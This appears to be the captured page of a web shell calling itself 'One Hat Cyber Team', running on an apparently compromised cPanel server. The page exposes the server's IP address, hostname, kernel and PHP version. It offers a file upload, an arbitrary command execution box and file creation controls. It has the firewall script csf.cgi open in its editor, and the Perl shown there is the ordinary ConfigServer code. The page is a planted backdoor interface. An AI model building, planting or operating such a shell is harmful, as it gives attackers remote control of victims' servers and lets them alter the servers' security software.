PK<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Default page</title>
    <link rel="icon" type="image/x-icon" href="//hpanel.hostinger.com/favicons/hostinger.png">
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="Default page" name="description">
    <meta content="width=device-width, initial-scale=1" name="viewport">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="//fonts.googleapis.com/css2?family=Bree+Serif&family=Rock+Salt&display=swap" rel="stylesheet">
    <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <style>body{color:#000;font-size:0;font-family:'Bree Serif',serif;width:99%;padding:0;margin:7px auto;background-color:black!important}.bg-dark{background-color:black!important}.border{box-shadow:0 0 10px #ff1493;border:2px solid #ff1493!important;border-radius:5px;background:#fff0}.border:hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.form-group{margin:.2rem 0}li{font-size:large!important;color:#ff1493!important;list-style:inherit!important}a{color:#fff;text-decoration:none!important}a:hover{color:#ff1493;animation:kedip 1s linear infinite}h5{margin:1.5px 0;color:#ff1493!important;padding:2px}textarea{width:97%;font-size:medium!important;font-family:inherit;height:44vh;padding-left:5px}button,input{border:2px solid #ff1493;border-radius:5px;font-size:15px;color:#fff;line-height:normal;font-family:inherit}button:hover,input:hover{cursor:pointer}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-family:inherit;font-size:16px}.ohct:hover{color:#ff1493!important}.combet{color:#fff}.combet:hover{color:#ff1493}.p-1{padding:4px}::selection{color:#000;background:silver}.fa{padding:10px;font-size:20px;width:50px;text-align:center;margin:5px;color:#ff1493}.fa:hover{border:2px solid #ff1493}.text-light{color:#f8f9fa!important;font-size:large!important}.kedip{animation:kedip 1s linear infinite}@keyframes kedip{0%,100%{color:#ff1493}50%{color:#fff}}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowText{0%,100%{color:#ff1493}14%{color:#f0f}28%{color:lime}42%{color:#ff0}57%{color:orange}71%{color:#ff1493}85%{color:pink}}@keyframes rainbowText1{0%,100%{color:pink}14%{color:#ff1493}28%{color:orange}42%{color:#ff0}57%{color:lime}71%{color:#f0f}85%{color:#ff1493}}.rainbow-text{animation:rainbowText 2s infinite;font-weight:700}.rainbow-text1{animation:rainbowText1 2s infinite;font-weight:700}hover{box-shadow:0 0 10px #ff1493}.table td{padding:.1rem;box-shadow:inset 0 0 0 1px #ff1493;border-radius:2px}.table thead th{font-family:'Bree Serif',serif;box-shadow:inset 0 0 0 1.5px #ff1493;color:#ff1493;padding:.25rem;border-radius:5px;background:linear-gradient(to bottom,black,rgb(63 63 63 / .5))}.table-hover tbody tr:hover td{background:rgb(63 63 63 / .5)}.form-control{background:transparent!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}.ohct{padding:0 1rem;color:#fff;border:2px solid #ff1493;border-radius:5px;background-color:#fff0;font-size:16px}.ohct:hover{color:#ff1493!important}.rainbow-border{border:2px solid #ff1493;border-radius:5px!important;animation:rainbowBorder 2s linear infinite}@keyframes rainbowBorder{0%{border-image:linear-gradient(to right,#ff1493,magenta) 1}14%{border-image:linear-gradient(to right,magenta,lime) 1}28%{border-image:linear-gradient(to right,lime,yellow) 1}42%{border-image:linear-gradient(to right,yellow,orange) 1}57%{border-image:linear-gradient(to right,orange,#ff1493) 1}71%{border-image:linear-gradient(to right,#ff1493,pink) 1}85%{border-image:linear-gradient(to right,pink,#ff1493) 1}}</style>
  </head>
<body>
    <div class="table-responsive text-light rainbow-border" style="text-align: left; padding: 4px;">
        <div style="text-align: center; display: flex; align-items: center; justify-content: center;">
            <a href="//t.me/combetohct" target="_blank" rel="noopener noreferrer">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-right: 0.5rem;">&#9885;</span>
            </a>
            <a href="?" style="font-size: 1.5rem; padding: 0.5rem;">
                <span class="rainbow-text" style="font-family: Rock Salt;">One Hat Cyber Team</span>
            </a>
            <a href="mailto:combetohct@yahoo.com">
                <span class="material-symbols-outlined rainbow-text1" style="font-size: 3rem;padding-left: 0.5rem;">&#9885;</span>
            </a>
        </div>
        <ul style="margin: 0; padding-inline-start: 30px;">
        <li>Your IP: <span style="color: white;">216.73.216.5</span></li>
        <li>Server IP: <span style="color: white;">188.40.97.147</span></li>
        <li>Server: <span style="color: white;">Linux server.ltv-eg.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64</span></li>
        <li>Server Software: <span style="color: white;">Apache</span></li>
        <li>PHP Version: <span style="color: white;">8.2.30</span></li>
            <li>
                <a href="?p=2f7573722f6c6f63616c2f7372632f6373662f6370616e656c&a=6e657746696c65" class="ohct">Buat File</a> | 
                <a href="?p=2f7573722f6c6f63616c2f7372632f6373662f6370616e656c&a=6e6577446972" class="ohct">Buat Folder</a>
            </li>
        </ul>
        <form action="" method="POST" enctype="multipart/form-data" style="padding: 0.10rem; display: inline-block; margin: 2px 0;">
        <input type="file" name="uploadedfilenya">
        <input type="submit" name="uploadfilenya" value="Upload" class="button ohct">
    </form>
           <form method="POST" style="margin: 2px 0;">
            <div class="form-group">
                <input type="text" name="command" class="border p-1" style="text-align: center; width: 296px; height: 29px;" placeholder="Masukkan Command">
                <button type="submit" name="execute_command" class="ohct">Eksekusi</button>
            </div>
        </form>
            </div>
<div class="table-responsive text-light rainbow-border" style="text-align: left;padding: 4px;margin-bottom: 3px;margin-top: 3px;">
<li>Dir : <span><a href="?p=2f" class="combet">~</a>/<a class="combet" href="?p=2f757372">usr</a>/<a class="combet" href="?p=2f7573722f6c6f63616c">local</a>/<a class="combet" href="?p=2f7573722f6c6f63616c2f737263">src</a>/<a class="combet" href="?p=2f7573722f6c6f63616c2f7372632f637366">csf</a>/<a class="combet" href="?p=2f7573722f6c6f63616c2f7372632f6373662f6370616e656c">cpanel</a>/ 
</span></li></div>
<div class="table-responsive text-light" style="text-align: center;font-family: inherit;font-size: large;">
<h5 class="p-1 rainbow-border">Edit File: csf.cgi</h5>
    <form method="POST">
        <textarea name="edited_content" cols="30" rows="10" class="form-control rainbow-border">#!/usr/bin/perl
#WHMADDON:csf:ConfigServer Security & Firewall
###############################################################################
# Copyright (C) 2006-2025 Jonathan Michaelson
#
# https://github.com/waytotheweb/scripts
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 3 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, see <https://www.gnu.org/licenses>.
###############################################################################
## no critic (RequireUseWarnings, ProhibitExplicitReturnUndef, ProhibitMixedBooleanOperators, RequireBriefOpen)
use strict;
use File::Find;
use Fcntl qw(:DEFAULT :flock);
use Sys::Hostname qw(hostname);
use IPC::Open3;

use lib '/usr/local/csf/lib';
use ConfigServer::DisplayUI;
use ConfigServer::DisplayResellerUI;
use ConfigServer::Config;
use ConfigServer::Slurp qw(slurp);

use lib '/usr/local/cpanel';
require Cpanel::Form;
require Cpanel::Config;
require Whostmgr::ACLS;
require Cpanel::Rlimit;
require Cpanel::Template;
require Cpanel::Version::Tiny;
###############################################################################
# start main

our ($reseller, $script, $images, %rprivs, $myv, %FORM);

Whostmgr::ACLS::init_acls();

%FORM = Cpanel::Form::parseform();

my $config = ConfigServer::Config->loadconfig();
my %config = $config->config;
my $slurpreg = ConfigServer::Slurp->slurpreg;
my $cleanreg = ConfigServer::Slurp->cleanreg;

Cpanel::Rlimit::set_rlimit_to_infinity();

if (-e "/usr/local/cpanel/bin/register_appconfig") {
	$script = "csf.cgi";
	$images = "csf";
} else {
	$script = "addon_csf.cgi";
	$images = "csf";
}

foreach my $line (slurp("/etc/csf/csf.resellers")) {
	$line =~ s/$cleanreg//g;
	my ($user,$alert,$privs) = split(/\:/,$line);
	$privs =~ s/\s//g;
	foreach my $priv (split(/\,/,$privs)) {
		$rprivs{$user}{$priv} = 1;
	}
	$rprivs{$user}{ALERT} = $alert;
}

$reseller = 0;
if (!Whostmgr::ACLS::hasroot()) {
	if ($rprivs{$ENV{REMOTE_USER}}{USE}) {
		$reseller = 1;
	} else {
		print "Content-type: text/html\r\n\r\n";
		print "You do not have access to this feature\n";
		exit();
	}
}

open (my $IN, "<", "/etc/csf/version.txt") or die $!;
$myv = <$IN>;
close ($IN);
chomp $myv;

my $bootstrapcss = "<link rel='stylesheet' href='$images/bootstrap/css/bootstrap.min.css'>";
my $jqueryjs = "<script src='$images/jquery.min.js'></script>";
my $bootstrapjs = "<script src='$images/bootstrap/js/bootstrap.min.js'></script>";

my @header;
my @footer;
my $htmltag = "data-post='$FORM{action}'";
if (-e "/etc/csf/csf.header") {
	open (my $HEADER, "<", "/etc/csf/csf.header");
	flock ($HEADER, LOCK_SH);
	@header = <$HEADER>;
	close ($HEADER);
}
if (-e "/etc/csf/csf.footer") {
	open (my $FOOTER, "<", "/etc/csf/csf.footer");
	flock ($FOOTER, LOCK_SH);
	@footer = <$FOOTER>;
	close ($FOOTER);
}
unless ($config{STYLE_CUSTOM}) {
	undef @header;
	undef @footer;
	$htmltag = "";
}

my $thisapp = "csf";
my $reregister;
my $modalstyle;
if ($Cpanel::Version::Tiny::major_version >= 65) {
	if (-e "/usr/local/cpanel/whostmgr/docroot/cgi/configserver/${thisapp}/${thisapp}.conf") {
		sysopen (my $CONF, "/usr/local/cpanel/whostmgr/docroot/cgi/configserver/${thisapp}/${thisapp}.conf", O_RDWR | O_CREAT);
		flock ($CONF, LOCK_EX);
		my @confdata = <$CONF>;
		chomp @confdata;
		for (0..scalar(@confdata)) {
			if ($confdata[$_] =~ /^target=mainFrame/) {
				$confdata[$_] = "target=_self";
				$reregister = 1;
			}
		}
		if ($reregister) {
			seek ($CONF, 0, 0);
			truncate ($CONF, 0);
			foreach (@confdata) {
				print $CONF "$_\n";
			}
			&printcmd("/usr/local/cpanel/bin/register_appconfig","/usr/local/cpanel/whostmgr/docroot/cgi/configserver/${thisapp}/${thisapp}.conf");
			$reregister = "<div class='bs-callout bs-callout-info'><h4>Updated application. The next time you login to WHM this will open within the native WHM main window instead of launching a separate window</h4></div>\n";
		}
		close ($CONF);
	}
}

print "Content-type: text/html\r\n\r\n";
#if ($Cpanel::Version::Tiny::major_version < 65) {$modalstyle = "style='top:120px'"}

my $templatehtml;
my $SCRIPTOUT;
unless ($FORM{action} eq "tailcmd" or $FORM{action} =~ /^cf/ or $FORM{action} eq "logtailcmd" or $FORM{action} eq "loggrepcmd") {
#	open(STDERR, ">&STDOUT");
	open ($SCRIPTOUT, '>', \$templatehtml);
	select $SCRIPTOUT;

	print <<EOF;
	<!-- $bootstrapcss -->
	<link href='$images/configserver.css' rel='stylesheet' type='text/css'>
	$jqueryjs
	$bootstrapjs
<style>
.toplink {
top: 140px;
}
.mobilecontainer {
display:none;
}
.normalcontainer {
display:block;
}
EOF
	if ($config{STYLE_MOBILE} or $reseller) {
		print <<EOF;
\@media (max-width: 600px) {
.mobilecontainer {
	display:block;
}
.normalcontainer {
	display:none;
}
}
EOF
	}
	print "</style>\n";
	print @header;
}

unless ($FORM{action} eq "tailcmd" or $FORM{action} =~ /^cf/ or $FORM{action} eq "logtailcmd" or $FORM{action} eq "loggrepcmd") {
	print <<EOF;
<div id="loader"></div><br />
<div class='panel panel-default'>
<h4><img src='$images/csf_small.png' style='padding-left: 10px'> ConfigServer Security &amp; Firewall - csf v$myv</h4></div>
EOF
	if ($reregister ne "") {print $reregister}
}

#eval {
if ($reseller) {
	ConfigServer::DisplayResellerUI::main(\%FORM, $script, 0, $images, $myv);
} else {
	ConfigServer::DisplayUI::main(\%FORM, $script, 0, $images, $myv);
}
#};
#if ($@) {
#	print "Error during UI output generation: [$@]\n";
#	warn "Error during UI output generation: [$@]\n";
#}

unless ($FORM{action} eq "tailcmd" or $FORM{action} =~ /^cf/ or $FORM{action} eq "logtailcmd" or $FORM{action} eq "loggrepcmd") {
	print <<EOF;
<script>
function getCookie(cname) {
	var name = cname + "=";
	var ca = document.cookie.split(';');
	for(var i = 0; i <ca.length; i++) {
		var c = ca[i];
		while (c.charAt(0)==' ') {
			c = c.substring(1);
		}
		if (c.indexOf(name) == 0) {
			return c.substring(name.length,c.length);
		}
	}
	return "";
} 
\$("#loader").hide();
\$("#docs-link").hide();
\$.fn.scrollBottom = function() { 
  return \$(document).height() - this.scrollTop() - this.height(); 
};
\$('#botlink').on("click",function(){
	\$('html,body').animate({ scrollTop: 0 }, 'slow', function () {});
});
\$('#toplink').on("click",function() {
	var window_height = \$(window).height();
	var document_height = \$(document).height();
	\$('html,body').animate({ scrollTop: window_height + document_height }, 'slow', function () {});
});
\$('#tabAll').click(function(){
	\$('#tabAll').addClass('active');  
	\$('.tab-pane').each(function(i,t){
		\$('#myTabs li').removeClass('active'); 
		\$(this).addClass('active');  
	});
});
\$(document).ready(function(){
	\$('[data-tooltip="tooltip"]').tooltip();
	\$(window).scroll(function () {
		if (\$(this).scrollTop() > 500) {
			\$('#botlink').fadeIn();
		} else {
			\$('#botlink').fadeOut();
		}
		if (\$(this).scrollBottom() > 500) {
			\$('#toplink').fadeIn();
		} else {
			\$('#toplink').fadeOut();
		}
	});
EOF
	if ($config{STYLE_MOBILE} or $reseller) {
		print <<EOF;
	var csfview = getCookie('csfview');
	if (csfview == 'mobile') {
		\$(".mobilecontainer").css('display','block');
		\$(".normalcontainer").css('display','none');
		\$("#csfreturn").addClass('btn-primary btn-lg btn-block').removeClass('btn-default');
	} else if (csfview == 'desktop') {
		\$(".mobilecontainer").css('display','none');
		\$(".normalcontainer").css('display','block');
		\$("#csfreturn").removeClass('btn-primary btn-lg btn-block').addClass('btn-default');
	}
	if (top.location == location) {
		\$("#cpframetr2").show();
	} else {
		\$("#cpframetr2").hide();
	}
	if (\$(".mobilecontainer").css('display') == 'block' ) {
		document.cookie = "csfview=mobile; path=/";
		if (top.location != location) {
			top.location.href = document.location.href ;
		}
	}
	\$(window).resize(function() {
		if (\$(".mobilecontainer").css('display') == 'block' ) {
			document.cookie = "csfview=mobile; path=/";
			if (top.location != location) {
				top.location.href = document.location.href ;
			}
		}
	});
EOF
	}
	print "});\n";
	if ($config{STYLE_MOBILE} or $reseller) {
		print <<EOF;
\$("#NormalView").click(function(){
	document.cookie = "csfview=desktop; path=/";
	\$(".mobilecontainer").css('display','none');
	\$(".normalcontainer").css('display','block');
});
\$("#MobileView").click(function(){
	document.cookie = "csfview=mobile; path=/";
	if (top.location == location) {
		\$(".normalcontainer").css('display','none');
		\$(".mobilecontainer").css('display','block');
	} else {
		top.location.href = document.location.href;
	}
});
EOF
	}
	print "</script>\n";
	print @footer;
}
unless ($FORM{action} eq "tailcmd" or $FORM{action} =~ /^cf/ or $FORM{action} eq "logtailcmd" or $FORM{action} eq "loggrepcmd") {
	close ($SCRIPTOUT);
	select STDOUT;
	Cpanel::Template::process_template(
		'whostmgr',
		{
			"template_file" => "${thisapp}.tmpl",
			"${thisapp}_output" => $templatehtml,
			"print"         => 1,
		}
	);
}
# end main
###############################################################################
## start printcmd
sub printcmd {
	my @command = @_;
	my ($childin, $childout);
	my $pid = open3($childin, $childout, $childout, @command);
	while (<$childout>) {print $_}
	waitpid ($pid, 0);
	return;
}
## end printcmd
###############################################################################

1;
</textarea>
        <button type="submit" name="save_edit" class="ohct" style="margin-top: .2rem;">Simpan</button>
    </form>
</div>
 
</div>
<script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script>
<script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script>
</body>
</html>